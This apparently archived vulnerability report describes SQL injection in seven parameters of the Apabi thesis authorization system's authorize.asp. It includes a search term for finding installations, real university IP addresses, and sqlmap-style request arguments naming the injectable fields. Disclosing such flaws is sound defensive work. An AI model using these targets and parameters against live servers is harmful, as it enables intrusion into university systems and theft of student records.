某高校在用系统sql注入(7处打包)(DBA)(无需登录)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: RT ### 详细说明: Apabi论文授权提交系统 版权所有© 北京方正阿帕比技术有限公司 谷歌搜索:论文授权提交系统 北京大学复旦大学什么的都在其中~ [<img src="https://images.seebug.org/upload/201502/060814241c327099951e4c60760c02105295ae87.png" alt="屏幕截图(666).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/060814241c327099951e4c60760c02105295ae87.png) 漏洞文件authorize.asp 里的txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate 随便来几个案例 202.116.50.25/tasi/admin/authorize/authorize.asp?action=querylist --data "txtStuName=l&txtStuNo=&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&authorize=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate" 210.44.126.14/tasi/admin/authorize/authorize.asp?action=querylist --data "txtStuName=l&txtStuNo=&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&authorize=-1&public=-1" -p...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息